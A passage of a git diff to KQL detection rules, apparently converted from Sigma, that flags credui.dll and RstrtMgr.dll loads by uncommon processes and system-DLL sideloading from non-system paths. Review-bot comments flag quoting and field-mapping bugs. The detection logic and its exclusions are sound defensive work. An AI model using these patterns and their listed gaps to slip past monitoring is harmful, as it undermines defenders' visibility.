(InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SystemApps\\")))) and (not(((InitiatingProcessFolderPath 
contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql index 1982b74c..157e46ac 100644 --- a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql +++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql 
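Review bot: On the new side, `InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll")` tests the version info of the initiating process, not of the DLL being loaded, so it can only match an executable whose OriginalFileName is credui.dll, which does not happen in practice; the Sigma `OriginalFileName` selector is effectively lost and detection rests on `FolderPath endswith` alone, so a copy of the DLL loaded under another file name is missed. As far as I know DeviceImageLoadEvents exposes no version-info columns for the loaded image, so this is a field-mapping issue in the converter (the RstrtMgr rule in this commit shows the same pattern) rather than something to patch per rule. Until the backend is corrected, document the gap in the header, e.g. `// NOTE: loaded-image OriginalFileName is not available in DeviceImageLoadEvents; this rule matches on FolderPath only, so renamed copies of credui.dll are not detected`. The new `InitiatingProcessFolderPath startswith "C:\\Windows\\SystemApps\\"` exclusion is a whole-tree prefix like the existing Program Files/System32 ones; that is consistent with the rule's intent, but worth a one-line comment naming which SystemApps process drove it so future tuning can narrow it.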
@@ -12,4 +12,4 @@ // - Processes related to software installation DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\'" or (InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\'" or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files\\'" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\explorer.exe'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\'" or InitiatingProcessFolderPath 
startswith "C:\\Windows\\SysNative\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\'" or InitiatingProcessFolderPath startswith "C:\\WUDownloadCache\\'") or ((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp" and InitiatingProcessFolderPath startswith "C:\\Users\\'")))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql index c1aa955e..515402aa 100644 --- a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql +++ b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql 
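Review bot: Every path literal in the rewritten first exclusion block carries a stray trailing single quote — `"C:\\Windows\\Temp\\'"`, `"C:\\$WINDOWS.~BT\\'"`, `"C:\\Program Files\\'"`, through `"C:\\Users\\'"` — so none of these `startswith` clauses can match a real path and the whole block is dead; the rule will now fire on every installer, Windows Update and System32 process that loads RstrtMgr.dll, which is exactly the traffic the filter exists to drop. The second exclusion added in the same hunk (`... and InitiatingProcessFolderPath startswith "C:\\Users\\"`) shows the intended form, e.g. `InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\"` for the first literal. This looks like a quoting bug in the conversion script (the Sigma values presumably end in a backslash, which the quoting step turned into `\'`), so fix the converter and regenerate instead of hand-editing, and add a regression check that no emitted KQL string literal ends in `\'"`. Also note the rewrite changed the old drive-agnostic `contains ":\\Windows\\Temp\\"` form to `startswith "C:\\..."`, which silently stops covering hosts whose system drive is not C:; that may be intended but deserves a mention in the rule header.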
@@ -9,4 +9,4 @@ // - Legitimate applications loading their own versions of the DLLs mentioned in this rule DeviceImageLoadEvents -| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith 
"\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith 
"\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath 
endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath 
endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or 
FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or 
FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith 
"\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath 
endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith 
"\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll"))))
\ No newline at end of file
+| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or 
FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath 
endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or 